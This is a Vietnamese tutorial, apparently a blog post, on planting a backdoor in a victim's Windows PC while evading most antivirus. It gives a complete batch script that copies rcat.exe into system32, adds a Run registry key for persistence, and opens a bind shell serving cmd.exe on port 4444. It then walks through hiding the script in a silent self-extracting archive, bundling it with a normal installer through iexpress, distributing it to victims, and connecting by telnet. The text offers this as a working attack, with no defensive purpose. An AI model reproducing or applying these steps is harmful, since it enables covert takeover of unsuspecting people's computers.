Việc tạo backdoor qua mặt các antivirus (thuật ngữ FUD) thực ra không còn mới nữa, nếu các bạn search sẽ thấy rất nhiều bài viết về vấn đề này: mã hóa, đóng gói lại… Hôm nay mình sẽ giới thiệu với các bạn một phương pháp khá đơn giản để thả backdoor vào máy victim, cũng có chút vượt mặt antivirus nhưng chỉ là hầu hết antivirus thôi
Backdoor chúng ta sử dụng là rcat.exe, backdoor này được dùng thay thế cho netcat vì mục đích FUD. Kịch bản của chúng ta là làm sao vứt con này vào máy victim, cho nó chạy để nó mở cổng cho ta vào.
Trước tiên các bạn download rcat.exe tại đây (chỉ lấy rcat.exe)
Sau đó mở notepad tạo 1 đoạn script có nội dung như sau:
@echo off copy rcat.exe %systemroot%\system32\rcat.exe if errorlevel 0 goto regedit goto error :regedit reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\rcat.exe -L -d -p 4444 -e cmd.exe" if errorlevel 0 goto ip :error echo something wrong with the program. goto end :ip echo write down the IP address from the table ipconfig :end echo end. rcat -L -d -p 4444 -e cmd.exe
Save file này dạng ten.bat đặt chung thư mục với rcat.exe
Nén 2 file này với winRAR, các bạn lưu ý là tich vào Create SFX archive để tạo file exe
Chuyển qua tab Advance, chọn SFX option và điển như sau trong tab General
Điền tên file bat của các bạn trong tab Setup
Chọn Hide all trong tab modes
OK, vậy là ta đã file exe
Tiếp đến cần đóng gói file này với 1 file setup bình thường (setup nào cũng đc), mục đích là khi victim cài phần mềm thì vô tình cài cả backdoor của chúng ta
Để làm việc này, các bạn vào run gõ iexpress, rồi cứ đế mặc định nhấn Next cho đến Package Title, cứ điên bừa một cái gì đó rồi Next vài lần đến mục Packaged Files
Tại đây các bạn add 2 file: file backdoor exe mà chúng ta tạo ra và 1 file setup bất kỳ rồi Next
Tiếp đến, ta chọn Install Progam là setup thông thường, chọn Post install command là backdoor
Next tiếp, kế đến chọn Hidden và Next tiếp
Đến Package Name and Options, các bạn chọn đường dẫn cho file sắp tạo và nhớ tick vào lựa chọn như hình dưới
Tiếp đến chọn No restart, don’t save, Next và chờ cho nó đóng gói xong
OK, h bạn đã có file exe mới chứa trong nó 1 setup thông thường, 1 backdoor.Kết quả khi check trên virustotal
Việc kế là phân phát cho victim 
Giả sử victim cài đặt cái này, setup thông thường vẫn cài như bình thường, vẫn ra sản phẩm xyz nào đó, tuy nhiên backdoor của chúng ta đã âm thầm được cài vào máy victim, tự kích hoạt và chạy cùng win của hắn. Giả sử victim đã cài, chúng ta chỉ cần telnet vào thôi (Khuyến cáo các bạn nên dùng linux đế telnet vào, vì nếu bạn dùng windows telnet vào máy victim thì màn hình console sẽ tối thui, không nhìn được text đâu.
